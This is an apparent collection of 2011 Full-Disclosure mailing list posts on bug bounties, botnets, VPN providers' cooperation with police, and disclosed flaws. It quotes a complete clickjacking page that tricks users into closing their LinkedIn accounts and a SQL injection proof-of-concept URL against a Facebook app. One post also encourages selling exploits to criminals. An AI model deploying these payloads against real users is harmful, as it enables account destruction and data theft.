andrew.wall...@rocketmail.com wrote: I think you are mistaken, this email is not sent by my consultancy. I ask you to retract your statement or face legal action. --- Andrew Wallace Independent consultant https://plus.google.com/115085501867247270932/about -- On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question. ** IMPORTANT INFORMATION/DISCLAIMER * This document should be read only by those persons to whom it is addressed. If you have received this message it was obviously addressed to you and therefore you can read it, even it we didn't mean to send it to you. However, if the contents of this email make no sense whatsoever then you probably were not the intended recipient, or, alternatively, you are a mindless cretin; either way, you should immediately kill yourself and destroy your computer (not necessarily in that order). Once you have taken this action, please contact us.. no, sorry, you can't use your computer, because you just destroyed it, and possibly also committed suicide afterwards, but I am starting to digress.. * * The originator of this email is not liable for the transmission of the information contained in this communication. Or are they? Either way it's a pretty dull legal query and frankly one I'm not going to dwell on. But should you have nothing better to do, please feel free to ruminate on it, and please pass on any concrete conclusions should you find them. However, if you pass them on via email, be sure to include a disclaimer regarding liability for transmission. * * In the event that the originator did not send this email to you, then please return it to us and attach a scanned-in picture of your mother's brother's wife wearing nothing but a kangaroo suit, and we will immediately refund you exactly half of what you paid for the can of Whiskas you bought when you went to Pets** ** At Home yesterday. * * We take no responsibility for non-receipt of this email because we are running Exchange 5.5 and everyone knows how glitchy that can be. In the event that you do get this message then please note that we take no responsibility for that either. Nor will we accept any liability, tacit or implied, for any damage you may or may not incur as a result of receiving, or not, as the case may be, from time to time, notwithstanding all liabilities implied or otherwise, ummm, hell, where was I...umm, no matter what happens, it is NOT, and NEVER
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
On Sun, Nov 20, 2011 at 11:26 PM, xD 0x41 sec...@gmail.com wrote: You need to scrape up on your English, i clearly stated things here, do not try and bend any rules, I simply stated , this feature has been in MS for years... and yea, so what, ?? Its disabled by default, that doesnt mean it still is not there, idiotx2. YOU learn english. You Sir just made my day! -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symlink vulnerabilities
On Sun, Nov 6, 2011 at 11:33 PM, xD 0x41 sec...@gmail.com wrote: Nice :) I have put a post about this whole thread on www.crazycoders.com , will add this and props for those involved now :) thx to you, bugs and for others who were involved, also realise that i have now found that bzexe = bzip2 src code, so looking on debian/ubuntu and centos, there is a bzexe or bzip2 on every box,... luckily this issue is patched for both bzip2 and bzexe but know that it is even still being tested now against bunzip2 , on decompressions, but has not been done, only know that the src is same as bzip2 executable binary (linux), again, thx to everyone involved, it got patched within a day wich is what was the aim... Ubuntu is alittle safer ;s cheers. xd did you get your bananas yet? -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook Attach EXE Vulnerability
nice speculation, but imo it would make them look more bad, if they turn down the reports, because it will come back to them (either via the publication like in this case, or just simply someone exploiting it). so while I don't have personal experience working with the facebook security team, but at least they have a dedicated channel for reporting security related bugs and even a bounty program. thats more than the 99% of the sites/companies offer. btw: someone mentioned that 500 bucks isn't worth the efforts, but imo the same people would tell the same about $1000, or $5000 even. On Tue, Nov 1, 2011 at 1:54 AM, mutiny mut...@kevinbeardsucks.com wrote: The main thing is that the security division at facebook probably runs the bug hunting page (as with everywhere else, which does make a decent bit of sense). And, if you spot bugs before they do, then that looks bad on them (internally at the company and externally to the world). So, it is not in their interest to openly acknowledge your bugs, especially by paying you cash money (not to mention, accounting is going to hate them if they see bucks leaving the company for any reason, instead of coming in). Not to forget, it is in their interest to downplay your bug to the rest of the company and the world (for those same reasons). If you're doing research /for your own interest/, I recommend maintaining full-disclosure. Embrace the bazaar and burn down the cathedral. If you're interested in making money, the smart route is through script kiddies or whoever (but realize, you'll probably need to go ahead and write a reliable exploit, to see any real cash). Script kiddies (and agents of various governments) often have tons of money to throw around to either bolster their own image (and eventually get arrested) or make money from your bug (especially if you're providing a reliable exploit). Not to mention, the actual damage that will be caused by the majority of these black hats is nothing compared to what those companies are going to have done, before they eventually crash. You could also monetize your security research by taking an administration, research or QA position. But, too often, you're only ensuring that you'll never be interested in any of the work that crosses your desk, ever again. You'll laugh, if you ever end up taking a real job doing security research, when you see heads getting butted between research teams and QA teams. Most security companies, for example, do not look at their own products (imagine at HP, QA teams for various products would be screaming their heads off at Tipping Point, if they went bug hunting in HP products - often when it's publicly disclosed, those research teams will *still* stay away from it, so the QA teams can tackle it and avoid the headache). It often feels like the first person to market a firewall/IDS/IPS/etc.. pulled off the greatest exploitation, of a security vulnerability (and the most common/reliable vulnerability, social engineering), of all time. In short, what your father didn't tell you is: If you're trying to make money, by doing *independent* security research, *shop around* for a buyer. (Describe the impact to the buyer, to receive a bid, before releasing anything beyond generic details. If they do not make a serious bid, take your ball and go home. If you have the right friends, or enough spare money, involve a lawyer.) And, most importantly, forget what any of these cunts try to tell you about morals or ethics. They're only pushing their point-of-view on you. It's best to, at least, consider all of the view points and make a decision on what works for you/matters to you/etc... None of these people, including myself, can tell you what is morally or ethically wrong. And, don't let them heap shame on you, ever. Releasing a remote root/system vulnerability (even if you include a reliable exploit) to full-disclosure, conspiring with a company/individual to keep secrets for X amount of time and selling an exploit to an anonymous bidder should add no more weight to your shoulders than you already carry. Just be sure that *you* are happy with your decision. - sedition On 10/31/2011 6:11 PM, xD 0x41 wrote: Oh hey, 3k is great! I saw that they just made it look abit cheap... no wrath but, it is still a MULTI billion now, dollar company, so they shoukld be trying to make SURE they can out bi ANY underground payers.. thats all i had to question. thanks for clearing it up, but sure, if theyre paying better now thats cool, i should have said to, it is atleast a step in the right direction :s Still, they ARE*** a mutil frigging million dollar company lol, so why wouldnt they give say, 1k minimum and make sure they get people more than interested but even fuzzing for bugs wich could potentially be in use already... this is something theyre not covering atall really with 500bux. It is tho, a start...
Re: [Full-disclosure] Wipe off, rub out, reappear...
Is obvious, this is a very well made executable :) On Tue, Oct 11, 2011 at 12:18 PM, xD 0x41 sec...@gmail.com wrote: I dont care about *theyre* setup, and i said that, I only stated what CAN be done, in capable hands.. simple. You are reading deep into something, you seem to understand fkall about, seriously. On 11 October 2011 21:16, Christian Sciberras uuf6...@gmail.com wrote: I already beat you up to it - you know nothing about their setup. You don't know if their infection is the result of a botnet. I don't deny you know anything about botnets, I'm just saying from the looks of it you jumped to a load of conclusion without any proof whatsoever. On Tue, Oct 11, 2011 at 12:11 PM, xD 0x41 sec...@gmail.com wrote: screwit, im a bite, i know my shit here.. If i was not so smart, then i guess i would not have a modified ircd wich is similar... wow i know.. just seems you dont know crap about cc botnets , thats fo sure. I think i outlined a *good* setup, as i have seen it, or would not bothered to state the mods made.. is that simple. wwether it is hard t code or not, is not my business, nor i care for.. I just know, how they run, and, dont try bs me about what i do and dont know, because on this topic son, i have plenty of experience, and could easily match this with an AV spokesperson, and would not hesitate to, but what gains it to me ? None. I am here for those who give a crap, you sir, no nothing, atall, about even the controlling side of a good botnet wich, spreads fast. Most people, simply do not want you on them, then the better ones, simply hide as users on irc anyhow ;) Then again, i wouldnt know shit ey. gnite :-) have fun trying to pick apart anything with me in this area, i will enjoy tearing your anus out, word by word if i have to. xd On 11 October 2011 20:29, Christian Sciberras uuf6...@gmail.com wrote: If you ask me, you sound like bragging on something you wrote. Either that, or you're clueless to what you are saying. Just because my younger brother won't understand 5 lines of code I wrote doesn't make my 5 liner smart... Applying the analogy here, just because they're possibly clueless to how OS internals work doesn't mean the virus is doing anything particularly smart. On Tue, Oct 11, 2011 at 1:55 AM, xD 0x41 sec...@gmail.com wrote: Is obvious, this is a very well made executable :) Or, set up well to spread and then hide, and doing so with even its phone home, wich is normal nowdays, for example consider an ircd, it uses PING/PONG, what if you change the rfc, and use ascii characters,then do this to the bot, remove USER mode completely only allow it for set modes/opers, and then try take the thing down, if it is connected thru about 40 different ips and does not rely on dynami dns... it is not impossible, it is happening now, and, it is also visible, however, these c7c centres are so advanced, Ids are just not getting enough info...you cannot do a thing on the properly modified control centres, and, i have seen that code, it is extremely modified version of ircd... it cannot be used by a NOn operator, and uses a totally different rfc to phopne home etc, thus making conventional methods used atm, useless... as they will loook for the strings that they know, and always ids will perform some string of commands, and, then slowly the operator sees the servers, and one by one he blocks YOU out of his network. This is a dog eat dog world, bot masters can be exceptionallt ingenious when it comes to these things, and masking an exe nowdays, is not as simple as some peoples SFX rar kits :) So even kits nowdays, can be way more advanced than 2008/2009 even... there has been a burst of tech, so there is also a burst in virus numbers... but, smart cc centres, you wont take down so easily, and they will move before you can even decrypt theyre settings... wich is exactly why stuxnet is non stoppable.. unless the owner shuuts it down, it wont be killed.. xd On 11 October 2011 10:45, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 4:31 PM, Michael Schmidt mschm...@drugstore.com wrote: If its bot net code and it is behind an air barrier then it will never phone home. They It already broke the air wall to get in. It can certainly do so to get out. Bob ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by
Re: [Full-disclosure] VPN providers and any providers in general...
On Wed, Oct 5, 2011 at 3:53 AM, valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 20:35:16 CDT, adam said: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is *not* a criminal offense, don't you? tl;dr: Doesn't matter, you can end up in the slammer anyhow. Actually, the general rule is that if it's a civil proceeding it's only civil contempt. Refusing to comply with warrants or subpoenas pursuant to a criminal proceeding could very well get you criminal contempt. And even in civil proceedings the judge can stick you in jail till you decide to change your mind. And we're certainly discussing a criminal proceeding here. Journalist Judith Miller got to spend 4 months in jail for refusing to cooperate with a grand jury investigation. https://secure.wikimedia.org/wikipedia/en/wiki/Judith_Miller_(journalist)#Contempt_of_court And this dude spent 14 years in jail on a *civil* contempt charge: https://secure.wikimedia.org/wikipedia/en/wiki/H._Beatty_Chadwick http://searchenginewatch.com/article/2116048/Google-Forced-to-Release-WikiLeaks-Volunteers-Gmail-Info Google and Sonic.net, a small Internet service provider, have been forced to hand a WikiLeaks volunteer’s email information to the U.S. government under a secret and controversial court order. The type of information released includes login IPs of the volunteer and those with whom he communicated by email, as well as their email addresses. Sonic fought the order, dated January 4, 2011, but lost. Chief executive Dane Jasper told the Wall Street Journal that although the legal battle was expensive, “... it was the right thing to do.” It is unclear whether Google fought the order or willingly complied. ... The law under which this questionable seizure of private communications is permitted is called the Electronic Communications Privacy Act. It dates back to 1986, three years before the World Wide Web was born. Google and Microsoft are both members of a coalition fighting for reform, as this law allows law enforcement easier access to emails than postal mail. WikiLeaks founder Julian Assange has previously warned U.S. citizens that their Facebook, Yahoo, and Google account information is quite accessible to U.S. government officials. In fact, law enforcement officials don’t even need a search warrant to access private emails. While a search warrant would require they show probable cause that a crime has been committed, they must only demonstrate that they have “reasonable grounds” to believe the email records could be “relevant and material” to an investigation under the ECPA. Another controversial element of this type of email seizure is that the person isn’t notified that their email has been searched. Google and Sonic both lobbied, in this case, to be allowed to notify Appelbaum of the seizure. Under the 1986 law, however, they are prohibited from doing so. This type of court order is usually sealed. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
it seems that you aren't familiar what Clickjacking means then... On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 sec...@gmail.com wrote: Thats just lame dude if you could remove OTHER poples accounts, then id say 8clap clap*... but own account... whjat about just clicking close account , and lets skip creating a html page, for this... :) cheers On 8 October 2011 17:06, asish agarwalla asishagarwa...@gmail.com wrote: Be logged into Linkedin, in firefox Create a HTML page using the below code Open the created HTML page in a new firefox tab Play the simple game html head style button.dummy1{position:absolute;top:75px;left:177px;z-index:-10} button.dummy3{position:absolute;top:214px;left:177px;z-index:-10} #Div3{ opacity: 0; position: absolute; top: 25px; left: 160px; } #Div2{ opacity: 1; position: absolute; top: 65px; left: 340px; } #Div1 { opacity: 1; position: absolute; top: 65px; left: 195px; } #victim2 { opacity: 1; position: absolute; top: 65px; left: 50px; } #victim { opacity: 0.4; position: absolute; top: -226px; left: -35px; width:800px; height: 800px; } /style /head body div h1Please Click Twice on the Right Options And Then Click Submit/h1 /div div id=Div3 h155+27=?/h1 /div div id=victim2 h155 /h1 /div div id=Div1 h182/h1 /div div id=Div2 h195/h1 /div button type=button class=dummy3Submit/button div id=victim iframe src=https://www.linkedin.com/secure/settings?closemyaccountstart=goback=.nas_*1_*1_*1; border=0 scrolling=no width=650 height=1100/iframe /div /body /html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
The document appears to be password protected as well. Ive tried to open it in a VM and it prompts for a password. it seems that you missed it: Password to access the report is: 8nj98F4h9AW -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
i assume, there is way more credit-fraud and rape etc going on, than wares...or, police having to waste time, on wares... i think police themseves detedst those things, and hence why the clouds still linger over some websites wich should be 'down' yet, are not. it's not working like that, you can't expect that the cops/feds won't chase piracy while there are more serious crimes unresolved. sadly. That, is simply isp not complying with a takedown order wich is, completely up to them. Why would they want to loose good customers/people who bring them even traffic and revenue thru websites. it simply: not worth taking the risk. if you won't comply, you are risking that your whole business can go down the toilet, and if and when you can prove that you are right, you lost your business already. and usually those customers is the minority of your client base, and they are a risk for your own infrastructure also(they can hack/abuse your own servers). I dont promote ads on my one, but i have always maintained a very steady and friendly,helpful with security, to my hosters wich they really appreciated. So, sometimes being in IT pays off... I guess... but what a struggle to get anywhere, even for the harder stuff, and people like n3td34v completely dont see that, yep, we only see what you show on this list, and so far, you didn't really worked on your whitehat image. the whole issue of freedom of speech and, security especially,ie: when i submit a PoC, anything nowdays, could happen.. yeah, the net seems to be more similar than the real life, it's much harder to be truly anonymous nowadays. these are the clouds i really wish to lift, in order though, I first must set some people on this list into the same state of mind, wich is prooving to be alittle harder than i expected. I think the problem is more about how you deliver the message, not the message itself. n3td3v thinks i am personally attacking his whole persona, wich, i should, and could, maybe pentest him and then, see if that is illegal.Ifso then, i would assume my tool of choice3, nmap, would also be in danger ? you brought this (cat)fight to the mailing list, so of course he thinks that you personally attacking him. hehe... see how this can get offtopic, but really it is the same topic of security/vpn and now, i am bringing it to an isp and Noc level... and hopefully, some others will see the things said, and indeed, they know there is a lot more hard crime that could be done by police, wich would benmefit ALL communitys, and people IRL, asin kids, in some cases. see above, you can't expect that lesser crimes are ignored because there are other more serious crimes out there. I also detest the use of the law, for low level crappy crimes when they could be rm -rf'ing REAL dangerous people who actually, are trying to harm others, or simply, out for extortion and no other reason. see above. I can say now safely, i am from .au and, i feel happy we have the laws here for serious crimes, i detested the dd0s kiddy david cecil's 'defacing' and, trying to cryout for work... what a b*m... I simply lookin the paper, and ring. Anyhows, he is in a cell, and for good reason, and, ofc, things with him got more serious because he was defrauding people of money. This is when, things go down, when you durectly steal funds, ie, if i were to steal shares in M$ using a PC, id be considered a cyber-terrorist,and, the crime would also be classed as a cyber-attack of terror or some such name...because, it not only terrorises, but it also steals data and,not 'steals' but uses it. wich is not very nice to loose a credit rating, or have feds on your door, coz you trusted a website that got 'owned' and, your card used for like 90k ,used to signup to a million places, and whatever else.. now, this would have a huge bearing on the crime, because the impact is huge on the victim. I simply think, police online, are doing the right thing, and arresting those involved ij child porn,and other detstable activty,rather than worrying about the small guys, who are simply using the net, as a playground. http://en.wikipedia.org/wiki/Broken_windows_theory if you allow the small fishes to play, they will grow big. maybe not everyone, but imo many blackhat started with irc wars, taking over channels, defacing small sites, etc. if you see that you can break the rules and get away with it, you will push for more. at least for those who really enjoy doing this kind of stuff. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
On Mon, Oct 3, 2011 at 10:15 AM, GloW - XD doo...@gmail.com wrote: if you allow the small fishes to play, they will grow big. rubbish. Complete rubbish. Thats a very broad spectrum of people here, and while i may not seem whitehat atall, and am no hat really, I try remain neutral, and, that guy, as I mentioned, we only know you about as much, as you share here (except those who are digging up your identity right now, but I'm sure that most people really don't care). decided to show me he was attacking me aand, accusing, for things i simply have not done, wich, is alot like what you are trying todo. what do you mean by what I'm trying to do? I just stated that you brought this publicity to yourself. I have been in IT sec for years, and never once committed any kind of fraud.How pathetic would that be, if my own business was to flunk, because of say, cc fraid.. wich, i have personally experinced, and would not wish on my enemies. Where did I accused you doing such kind of attacks? And it would be indeed pathetic, but the world is full of pathetic people sadly. So pleease take the socialist theories elswhere. uhm, what? PS: In real life, they go after the fishes who make them loose money, not small nor big, it is VICTIM impact. always will be. And until there is firm enough laws, this will not change. Why would they chase me, even, for one pirated iso, not even pirated, a copy of an original i believe. the rest is pure freeware, from ms, i just removed the links purposely, but have them safely tucked here. So, who is silly for assuming that, i am low level at best with piracy not even a pirate, it was a backup, wich i used as experimental material in the end.. that would be too logical for the goverments, cops, and other authorities, so don't count on it. :( charging Assange is a good example. if you step on someone's leg powerful enough, or you simply unlucky, and end up being the scapegoat, you as screwed: http://news.yahoo.com/court-reinstates-675-000-damages-downloading-152335714.html Your socialist views, probably show where you are from, or shine through that custms, while we in the real world, tend to belive in the 'law'. ;-) rofl... you make me laff. have a good read party boi. xd that was rude and unjustified, it seems that it was too hard for you to counter my arguments. :/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook North Scottsdale Inventory - Remote SQL Injection Vulnerability
2011-00-00: Vendor Fix/Patch On Thu, Sep 29, 2011 at 11:34 AM, resea...@vulnerability-lab.com resea...@vulnerability-lab.com wrote: Title: == Facebook North Scottsdale Inventory - Remote SQL Injection Vulnerability Date: = 2011-09-29 References: === http://www.vulnerability-lab.com/get_content.php?id=272 VL-ID: = 272 Introduction: = The application is currently included and viewable by all facebook users. The service is an external 3rd party application sponsored by the ScottsdaleInventory. (Copy of the Vendor Homepage: http://apps.facebook.com/scottsdaleinventory/share.php) Facebook is a social networking service and website launched in February 2004, operated and privately owned by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Facebook users must register before using the site. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics. (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook) Abstract: = Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on the 3rd party web application - North Scottsdale Inventory (apps.facebook.com). Report-Timeline: 2011-09-17: Vendor Notification 2011-09-18: Vendor Response/Feedback 2011-00-00: Vendor Fix/Patch 2011-09-29: Public or Non-Public Disclosure Status: Published Affected Products: == North Scottsdale Inventory (Facebook Application) - 2011/Q3 Exploitation-Technique: === Remote Severity: = High Details: A SQL Injection vulnerability is detected on the North Scottsdale Inventory facebook application (apps.facebook). The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected fb application dbms. Vulnerable Module(s): [+] North Scottsdale Inventory - Facebook 3rd Party Application Vulnerable Param(s): [+] ?fbid= carid= Affected Application: [+] http://apps.facebook.com/scottsdaleinventory/ --- SQL Error Logs --- Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near -1` *view* at line 1 --- Picture(s): ../1.png Proof of Concept: = The vulnerability can be exploited be remote attackers. For demonstration or reproduce ... URL: apps.facebook.com/scottsdaleinventory/ Path: /scottsdaleinventory/ File: share.php Param: ?fbid= carid= Example: http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?fid=[x]carid=[x] PoC: http://apps.facebook.com/scottsdaleinventory/share.php?fbid=-1%27carid=-1%27 Solution: = Use the prepared statement class to fix the sql injection vulnerability filter sql error requests. Set error(0) to prevent against information disclosure via exceptions or error reports. Risk: = The security risk of the application sql injection vulnerability is estimated as high. Credits: Vulnerability Research Laboratory - N/A Anonymous Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
yeah, and usually the same goes for calling others kids ;) On Tue, Sep 27, 2011 at 10:30 PM, GloW - XD doo...@gmail.com wrote: #pure-elite , rofl... yes indeed :P hehe... nice story tho...funny about the elite channel thing... why do ppl tag themselves as elite? usually when they are not... ohwell, thats efnut :s (irc sucks) xd On 27 September 2011 19:03, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Hope this sends correctly, new email client and all... But seeing as it is an international investigation many people have been bending over backwards to assist LEO on this. HMA and perfect privacy were the VPN's of choice for them it would appear, oh, and he was part of the #pure-elite channel on that IRC server, and hence, considered by LEO and others as Part of LulzSec. TL;DR, this is nothing new. On Tue, Sep 27, 2011 at 6:53 AM, Laurelai Storm laure...@oneechan.org wrote: And the guy wasnt even a part of lulzsec On Sep 26, 2011 10:37 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Sep 26, 2011 at 8:47 PM, Ivan . ivan...@gmail.com wrote: http://www.h-online.com/security/news/item/VPN-provider-helped-track-down-alleged-LulzSec-member-1349666.html Though HMA claims they complied with a court order, it looks as if they facilitated a law enforcement request. The US and the FBI have no jurisdiction in the UK. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] China - the land of open proxies
not asked, but ~suggested: This is offered as data you may be able to use for forensic purposes or router block lists. On Fri, Sep 2, 2011 at 12:42 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: No agenda. He’s providing a proxy list based on his continual research in the area. He didn’t ask you to block anything. T Common stock, we work around the clock; we shove the poles in the holes. From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of rancor Sent: Thursday, September 01, 2011 9:09 AM To: d...@mrhinkydink.com Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] China - the land of open proxies 2011/9/1 Mr. Hinky Dink d...@mrhinkydink.com In July, hundreds of Chinese proxies on port 8909 started showing up every day on public proxy lists. In August the daily numbers were in the thousands. Here is the list I collected during that period. There are 135K proxies in this file (text, tab delimited, ~8 megs). http://www.mrhinkydink.com/utmods/135k.txt You may want to right-click and save as. This is offered as data you may be able to use for forensic purposes or router block lists. Most of these proxies are currently offline. When they are online, they're very good proxies. You maybe just want us to block this IP since the most are offline and we will not be able to verify it's existens... What is your agenda? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is This MITM Attack to Gmail's SSL ?
On Tue, Aug 30, 2011 at 11:58 AM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Aug 29, 2011 at 7:46 PM, coderman coder...@gmail.com wrote: On Mon, Aug 29, 2011 at 4:35 PM, coderman coder...@gmail.com wrote: ... tech details http://pastebin.com/ff7Yg663 doh, try http://pastebin.com/SwCZqskV It looks like Mozilla will be revoking trust in the DigiNotar root, http://blog.mozilla.com/security/. google also: http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Is This MITM Attack to Gmail's SSL ?
http://www.google.co.uk/support/forum/p/gmail/thread?tid=2da6158b094b225ahl=en any thoughts? -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tor2web 2.0 is live! - NiX is doing copyright infrigment
